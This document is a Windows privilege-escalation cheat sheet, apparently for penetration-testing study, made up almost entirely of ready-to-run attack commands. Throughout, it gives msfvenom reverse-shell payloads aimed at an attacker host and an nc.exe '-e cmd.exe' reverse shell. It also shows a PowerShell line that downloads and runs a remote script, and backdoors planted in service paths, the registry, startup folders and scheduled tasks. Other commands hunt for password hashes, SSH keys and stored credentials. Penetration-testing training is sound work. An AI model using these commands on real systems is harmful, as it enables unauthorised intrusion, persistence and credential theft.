Windows

Windows Privilege Escalation

Enumeration

We need to enumerate for basic information before attempting to escalate privilege.

#Get Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch Information
wmic qfe get Caption, Description, HotFixID, InstalledOn

#Get current username
whoami 

#Get groups and permission information
whoami username /all 

#get user list
net user 

#get information for specific user
net user admin

#Get OS information like version, hotfix etc.
systeminfo 

#List all running process. Keep Note the suspicious one!
netstat -ano 

#List all profile's firewall rules!
netsh advfirewall firewall show rule name=all 

#List all installed software.
wmic product get name 

#List all installed software and version.
wmic product get name, version 

#Get scheuduled task list
schtasks /query /ms LIST /v

#Running Process
tasklist /SVC

#Vulnerable Drivers
driverquery.exe /fo table

Kernel Exploits

Kernel Exploit could be dangerous. So any kernel exploit should be run if there is no other way to escalate the privilege.

Get System Information and transfer to remote Linux host. This is the command we need to run before we find exploits on Google or Searchsploit:

$ systeminfo

Use Windows Exploit Suggester to get exploit suggestions:

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -i systeminfo.txt -u *.xls

We can use the information generated by Windows-exploit-suggester to find compiled exploit in the following link:

https://github.com/SecWiki/windows-kernel-exploits

Find Exploit in Google and Searchsploit. Example:

  • Google> Windows Version Privilege Escalation Exploit
  • Searchsploit> $ searchsploit windows 10

Service Exploits

If a service improperly configured, it may lead to escalate to higher privilege. 5 way service can be exploited.

  1. Insecure Service Permission
  2. Unquoted Service Path
  3. Insecure Registry Permission
  4. Insecure Service Executable
  5. DLL Hijacking

Service Enumeration

We should find out all running services and the version.

#cmd
tasklist /SVC

#powershell
Get-Service

#wmic
wmic service list brief

Listing All Running Services

sc queryex type=service 
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq "Running"}

Search for more info against a suspicious service with this cmd/powershell command

sc queryex type=service state=all | find /i "SERVICE_NAME: service_name"
#or
powershell.exe -c "Get-Service | Where-Object {$_.Name -like "*service_name*"}

Find the status of the target services! We can check with these command.

sc query service_name 
Get-Service service_name

Modifying a service binary path

sc config service_name binpath='c:\windows\temp\shell.exe'

Start and Stop a Service

net start serv_name
net stop serv_name

Exploit Insecure Services Permission

We need to find a suspicious service name. If a service running with permission SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS, We can exploit it by changing its binary path.

sc qc service_name
sc config service_name binpath="c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name

Exploiting Unquoted Service Path

If a service not enclosed within the quote, it may help us to escalate the privilege. Anyone folder of the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In C:\Program Files\ Directory, The “Deploy Ready” and “Service Files” subdirectory is writable. We can exploit this vulnerability to escalate the privilege. How does it work?

  1. When starting the service, if it failed to execute Deploy.exe
  2. It will execute C:\Program Files\Deploy Ready\Service.exe
  3. If Service.exe was not found, C:\Program Files\Deploy.exe will be executed!

Find Vulnerability

# Manually
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

# With winpeas
.\winPEAS.exe quiet servicesinfo

Test If any directory is writable:

  1. Manually
echo "Test";"C:\Path a\Path b\Path c\test.txt" #no permission denied? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
  1. With Accesschk (More efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"

Exploit

If we don’t have permission to restart the service we can try to reboot the machine. And if the service configured AUTO_START and run as LocalSystem, we will get a system shell

sc qc "service_name"
copy \\smb_ip\\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service try rebooting
shutdown /r /t 0

Insecure Registry Permission

If we can’t write to a service directory/folder, but can modify or write to registry, we can escalate the privilege.

Find Services

#Get All Services info
.\winPEAS.exe quiet servicesinfo

#Get All Services info
.\winPEAS.exe quiet servicesinfo
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

Confirm Registry weak permission

#Confirm Weak Permission with Powershell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName |Format-List

#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName

Exploit

If we are confirm that we can modify the registry:

#Add Backdoor to the Registry
reg add HKLM\SYSTEM\CurrentControlSet\srevices\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName

DLL Hijacking

If a program or service can’t load a dll file in specified directory, we can supply our own malicious dll for escalation. The DLL loading folder need to be writable!

Check Permission of the Program folder

icacls C:\program\

Create Malicious Dll File and move the payload to program specified directory.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o exsisting.dll

Now Try restart the service or execute the vulnerable program

Exploit Startup Program

We need to copy the accesschk64.exe to remote host to check permission. If a program has FILE_ALL_ACCESS permission, we can exploit it for system shell.

accesschk64.exe -wvu “C:\Program Files\Autorun Program”
copy \\smb_ip\backdoor.exe “C:\Program Files\Autorun Program\program.exe”

We can also get admin session by exploiting startup applications. Check the permission. If the folder has write permission, we just need to copy our shell.exe to that folder and wait for admin to login.

icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
copy \\smb_ip\bak.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe”

Exploiting AlwaysInstallElevated

We need to check if it is enabled. If the value is 0x1, we can exploit it!

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Generate backdoor with metasploit, and Transfer to victim machine

msfvenom -p windows\x64\meterpreter\reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder\shell.msi

Copy shell.msi to victim machine using SMB or other way and run:

msiexec /quiet /qn /i shell.msi

Exploiting Clear Text password

If we are in luck we may found password in clear text.

Finding WIFI password

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

Search Sensitive Files that may have credential

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2&gt;nul | findstr /v ".dll"

Search for “Password"

#Search suspicious files from filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i/v "\\windows"

#Search suspicious files from content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2&gt;nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>null

Search Password in Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2&gt;nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"

# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"

Try With Winpeas:

.\winPEAS.exe quiet filesinfo userinfo

RunAS

Using cmdkey

cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"

By providing credentials

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Exploiting Well known Software

Some software installed in the target machine may have public exploit to use. We should google search for a exploit with the version of installed software.

tasklist /v 
.\winpeas.exe quiet processinfo

Schedule Task

#From CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

For example above command found C:\Tools\Adm.Ps1 is running every 10 minutes as system and we have rights to modify it:

accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1

We simply can append our command to execute as system. Let’s append command to run rev.exe(Reverse shell to port 443):

echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1

If everything goes well, we should have shell as system in 10 minutes!

Dangerous User Privileges

Some privileges for a user is dangerous. They could lead to escalate to higher privilege I will list some of them:

SEImpersonatePrivilege

It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato

SeAssignPrimaryPrivilege

Assign an access token to new process. Can be exploited with JuicyPotato

SeBackUpPrivilege

If a user has this privilege he is able to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack

SeRestorePrivilege

This privilege grant a user to modify service binary, dll, also modify registry settings

Others risky Privilege

  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeDebugPrivilege

Hot Potato Exploit

A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/

Windows 7

.\Potato.exe -ip &lt;local ip> -cmd &lt;command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip &lt;local ip> -cmd &lt;cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If SeImpersonate/SeAssignPrimaryToken JuicyPotato can be used to escalated privilege.

Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Just another Windows Local Privilege Escalation from Service Account to System. So the requirement is the accessed account needed to be a service account.

.\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\Windows\Temp\rev.exe

Useful Commands

PowerUp

powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.21:8000/PowerUp.ps1'); Invoke-AllChecks"

Port Forwarding

chisel server -p 8000 --reverse
chisel.exe client 10.10.14.3:8000 R:1337:socks
socks5 127.0.0.1 1337
proxychains4 nmap 127.0.0.1 -p 8888

BloodHound

impacket-smbserver test $(pwd)

powershell -ep bypass -command "import-module \\10.10.14.7\test\SharpHound.ps1; invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice"

Reference: https://redtm.com/docs/privilege-escalation/2020-07-privilege-escalation/windows-privilege-escalation-cheatsheet-for-oscp/

← Pivoting